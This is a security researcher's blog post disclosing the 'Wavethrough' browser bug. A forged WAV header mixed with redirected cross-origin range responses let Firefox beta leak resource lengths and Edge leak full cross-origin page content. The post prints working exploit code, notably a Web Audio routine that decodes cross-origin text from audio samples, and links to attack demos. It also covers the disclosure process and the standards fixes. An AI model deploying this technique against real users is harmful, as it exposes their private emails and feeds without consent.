I discovered a browser bug
I accidentally discovered a huge browser bug a few months ago and I'm pretty excited about it. Security engineers always seem like the "cool kids" to me, so I'm hoping that now I can be part of the club, and y'know, get into the special parties or whatever.
I've noticed that a lot of these security disclosure things are only available as PDFs. Personally, I prefer the web, but if you're a SecOps PDF addict, check out the PDF version of this post.
Oh, I guess the vulnerability needs an extremely tenuous name and logo right? Here goes:
Why Wavethrough? Well, it involves wave audio, and data is allowed through that shouldn't be. Tenuous enough?
All the browser security bugs I cover in this post have since been fixed. Make sure your browser is up to date.
As I said, I stumbled into this whole thing by accident. Here's how it happened from the start:
Media via a service worker didn't quite work
If you have a service worker like this:
addEventListener('fetch', (event) => {
event.respondWith(fetch(event.request));
});
…the idea is you shouldn't see any behavioural difference between this and no-service-worker. Unfortunately cross-origin <video>
and <audio>
doesn't quite behave the same. Seeking doesn't work, and sometimes it fails entirely.
<video>
and <audio>
are different from most web APIs in that they use range requests. Ok, let's push that onto the stack:
Range requests
Usually when the browser makes a request, it's asking for the whole resource. However, HTTP defines the Range
header and partial content responses. For example, the request may have the following header:
Range: bytes=50-100
…which is requesting bytes 50-100 (inclusive) of the resource. The server may then respond with a 206 Partial Content
, and a header like this:
Content-Range: bytes=50-100/5000
…indicating it's returning bytes 50-100 (inclusive) of a 5000 byte resource.
Browsers use this for resuming downloads, but it's also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it's one of those annoying media formats that has important metadata at the end of the file.
Unfortunately, via a service worker, that Range
header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call "no-cors" requests. Let's push that onto the stack too:
No-cors requests
If you fetch()
something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that. If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.
However, some APIs couldn't give a shit about all that. They make "no-cors" requests, so the checks above don't happen. If you make a no-cors request to another origin, it's sent with cookies and you get back an "opaque" response. Developers shouldn't be able to access the data of an opaque response, but particular APIs may interpret that data behind the scenes.
Take <img>
for instance. If you include an <img>
that points to another origin, it'll make a no-cors request to that origin using that origin's cookies. If valid image data is returned, it'll display on your site. Although you can't access the pixel data of that image, data is still leaked through the width
and height
of the image. You also know whether or not you received valid image data.
Let's say there's an image that's only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img>
whether that user is logged into that site. The user's privacy has been compromised. Yaaaay.
Allowing this to happen is a mistake, but we have decades of content depending on this behaviour. We can't simply prevent it, but we can add things to mitigate it in certain situations. If we started the web again, everything would require something like CORS.
It isn't just images either. Classic non-module scripts, CSS, and media elements also make no-cors requests by default.
No-cors + ranges + service workers
So, back to our pass-through service worker:
addEventListener('fetch', (event) => {
event.respondWith(fetch(event.request));
});
A media element would make a no-cors request with a Range
header. When it's passed to fetch()
the request object is checked. At this point fetch sees a header (Range
) that isn't allowed in no-cors requests, and silently removes it. Therefore the server doesn't see the Range
header, so it just responds with a standard 200 response.
Why is this header filtered? Well, no one standardised how they were supposed to work. Actually that deserves its own heading:
Range requests were never standardised
They're standardised in HTTP, but not by HTML. We know what the headers look like, and when they should appear, but there's nothing to say what a browser should actually do with them.
- Should all media requests be range requests, or just additional requests?
- What happens if the returned range ends sooner/later than what the browser asked for?
- What happens if the returned range starts sooner/later than what the browser asked for?
- What happens if a range is requested but the server returns a normal 200 response?
- What happens if a range is requested but the server returns a redirect?
- What happens if the underlying content appears to have changed between requests?
- What happens if a normal request is made but a 206 partial is returned?
None of this is defined, so browsers all kinda do different things. Yay.
We couldn't just add the Range
header to the safelist, as developers would be able to set it to values the browser would never usually send, and that presents a security risk.
Also, with a service worker in the middle, you can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img>
on your page that points to facebook.com
, but your service worker could return data from twitter.com
. This isn't a problem as you can only lie to yourself.
However, media elements piece multiple responses together and treat it as a single resource, and that opens up an interesting attack vector: Can known data be mixed with unknown data to reveal the content of the unknown data?
I pretended to be a hacker and wrote down all the attacks I could think of, and Anne van Kesteren pointed out that some of them were possible without a service worker, as you can do similar things with redirects. So, I investigated how browsers currently handle these situations.
Mixing known and unknown data
"/whatever.wav". 10:24
Hey, this audio tag needs audio data from10:24
No problem, here's 44 bytes of data.Range: 44- please? 10:24
Cool, I see this is a PCM WAV header, 1 channel, 44100hz, 8bit, 30mins long. However, that's not enough data, can you send mefacebook.com/ instead. 10:24
Oh, get that fromfacebook.com/, here are your cookies, can I get Range: 44- please? 10:24
Ok10:25
Sure, here you go…I created a site that does the above. I used a PCM wav header because everything after the header is valid data, and whatever Facebook returned would be treated as uncompressed audio.
In my opinion, browsers should reject the response from Facebook, as the media element shouldn't allow mixing visible and opaque data. Nor should it allow opaque data from multiple sources, although that isn't happening here.
Chrome and Safari rejected as soon as they saw the redirect. This is safe, although they would need to check the response if a service worker was in the middle too, since that can result in a response from somewhere else without a redirect occurring.
However…
Firefox security bug
Beta and nightly versions of Firefox at the time allowed the redirect, combine the responses together, and expose the duration of the audio through mediaElement.duration
.
Because I set the frequency, bit depth, and channel count of the audio in the header, I could determine the length of the cross-origin resource from the audio length using ✨basic maths✨.
const contentLength =
audio.duration * /* WAV frequency */ 44100 + /* WAV header length */ 44;
It looks like the size isn't detected exactly, but Google returns a range, so the reported size includes the extra 44 bytes that are missing from the start (the WAV header).
And here's a link to the attack, which works in Firefox 59.0b9 at least.
Leaking the length of a resource may not sound like a big deal, but consider an endpoint like gender.json
. The content length can give a lot away. Also see Timing attacks in the Modern Web (PDF, heh) which demonstrates the amount of information content-length can leak.
Firefox handled this brilliantly. Within three hours Paul Adenot replied to the bug report, confirming it, and digged into other potential leaks (there weren't any). I was able to engage with engineers directly on how the issue should be fixed, which was important as I was planning how to standardise the mitigation.
Since this was a regression caught in beta, Firefox were able to patch it before it reached stable.
Edge security bug
Edge suffered from the same kind of bug, but with a huge twist. Firstly, it didn't care if the other server returned a 206 or not. Secondly, and this is the big one, it allowed the resulting audio to pass through the web audio API. The web audio API is like the <canvas>
equivalent for audio, meaning I could monitor the samples being played:
// Get the audio element.
const audio = document.querySelector('audio');
// Create a web audio context.
const ac = new AudioContext();
// Connect the two.
const source = ac.createMediaElementSource(audio);
// Create a script processor.
// This lets me transform the audio data. I don't really care
// about transforming, I just want to collect the data.
const scriptNode = ac.createScriptProcessor(256, 1, 1);
const datas = [];
scriptNode.onaudioprocess = (event) => {
const inputData = event.inputBuffer.getChannelData(0);
// Store the audio data
if (!audio.paused) datas.push(inputData.slice());
};
// Connect the processor.
source.connect(scriptNode);
scriptNode.connect(ac.destination);
audio.addEventListener('ended', (event) => {
source.disconnect(scriptNode);
scriptNode.disconnect(ac.destination);
// Now I can look at all the data received, and turn it from
// audio sample data, back into bytes, then into a string.
const str = datas.reduce((str, data) => {
// Each sample is -1 to 1.
// In the original wav it was 16-bits per sample,
// so I map each value to a signed 16-bit value.
const ints = Array.from(data).map((num) => Math.round(num * 32768));
// Then put that into a typed array.
const int16 = new Int16Array(ints);
// But, assuming utf-8, I need unsigned 8-bit chunks:
const bytes = new Uint8Array(int16.buffer);
// Now I can create a string from that.
return (
str +
Array.from(bytes)
.map((b) => String.fromCharCode(b))
.join('')
);
}, '');
// Output the data.
document.body.appendChild(document.createTextNode(str));
});
And here's what that looks like:
The text you see is the content of BBC News. Since the request is made with cookies, the content is the "logged in" view, although I wasn't logged in for the demo.
It's kinda pathetic how excited I got about this, but this is a huge bug. It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing.
And here's a link to the attack. If this works in your version of Edge, update your browser immediately.
Reporting the bug to Microsoft
You're about to witness a boy in his mid-30s having a massive entitled whinge. If you want to avoid that, skip this section, but I really need to get it off my chest. The experience I had with Microsoft was very different to Firefox.
I filed the issue in Edge's bug tracker on March 1st and notified secure@microsoft.com. I got an email from Microsoft security later that day saying that they don't have access to Edge's bug tracker, and asked if I could paste the details into an email for them. So yeah, Microsoft's security team don't have visibility into Edge security issues. Anyway, I sent them the details of the exploit over plain email. Update: Turns out when you file a security bug with Edge, you get a special URL only the reporter can access. I didn't know this was the case, and it didn't seem like the security contact at MS knew either.
The next day they said they couldn't investigate the issue unless I provided the source code. C'mon folks, the "view source" button is right there. Anyway, I sent them the source. Then there was 20 days of silence.
At this point I had no idea if they were able to understand the issue, or if they knew how serious it was. I pointed out that the attack could be used to read people's private messages, but received no response.
Update: 16 days into the silence I sent a further email "Is it ok if I present this exploit at a conference next week?". I wasn't booked to speak at any conference, I was just trying to elicit a response, to get some indication that the lights were on. It didn't work. I recently found out Microsoft characterised this as a threat.
I asked Jacob Rossi and Patrick Kettner (awesome folks who work on the Edge team) if they could chase it internally. After they did, I finally got a reply from Microsoft security saying they were "developing a fix", with no further detail.
If you find a bug like this, you're eligible for a bounty. I asked if I could nominate a charity or two to receive the bounty. There was no response. 14 days of silence.
I asked Patrick to chase them again (thanks Patrick!), and they replied saying they wouldn't be able to give the bounty to charity, despite their public docs saying otherwise. Apparently the rules changed at some point, and I was looking at old docs. Whatever. Thankfully Google are ok with me taking the money directly, and will match what I donate (I found the bug while at work, so I was worried about the legal implications of taking the money. I'm sure there'll be some tax complications too, ugh).
I wasn't getting any progress update, or any details on how they planned to fix it (which would have been useful from a standards perspective). So, I shitposted on Twitter, and Jun Kokatsu kinda sniped back. Jun is a security engineer at Edge, and we got chatting over DMs. And holy shit, this is who I should have been talking to all along.
Jun told me there had been a lot of activity around the bug internally, and they're looking to improve visibility of this kind of stuff to the reporter. We were able to discuss what the fix would look like, and how that would work with a service worker in the middle. I really can't stress enough how helpful Jun has been.
Microsoft released a patch for the bug, and published CVE-2018-8235. I found out about this through Jun. I haven't heard anything through the official channel.
On June 7th I asked the official contact for an update on the bug bounty, since they haven't confirmed any of that yet. I've yet to receive a reply. Update: Shortly after publishing this they contacted me to say I qualify for the bounty.
Ok, that was a lot of complaining, but I really want Microsoft to look at the experience I had with Firefox and learn from it. Security issues like this put their users at huge risk, and they need to ensure reporting these things isn't more effort than it's worth.
Standards are important
I've covered two browser security issues here, but these bugs started when browsers implemented range requests for media elements, which wasn't covered by the standard. These range requests were genuinely useful, so all browsers did it by copying each others behaviour, but no one integrated it into the standard.
The result is the browsers all behave slightly differently, and some ended up with security issues.
This is why standards are important. Chrome had a similar security issue a few years ago, but instead of just fixing it in Chrome, the fix should have been written into a standard, and tests should have been written for other browsers to check against.
I've been working to improve standards here. Range requests are now able to pass through a service worker safely according to the spec. The next step is to specify the request and response handling for media elements.
Also, CORB has been added to fetch. The aim here is to reduce the capabilities of no-cors while retaining compatibility with the web. For instance:
<img src="https://facebook.com/secret-data.json" />
Previously, the above would fail to load, but the response would be in the same process as the rest of the page. This is really bad thing given Spectre and Meltdown. But CORB will prevent that resource entering the page process, since its content (JSON) isn't something that can be loaded by any no-cors API.
CORB also prevents the attack outlined in this post, as it wouldn't allow text/html
content to enter the process as the result of a no-cors request.
And that's it! I now have a CVE number I can have etched on my grave. And I'm going to sit here and patiently await my invite to all the cool security parties.
Thanks to Sandra and Monica Stromann, whose icons I butchered to create the Wavethrough logo. Also thanks to Mathias Bynens, Jun Kokatsu, and Paul Lewis for proofreading & corrections.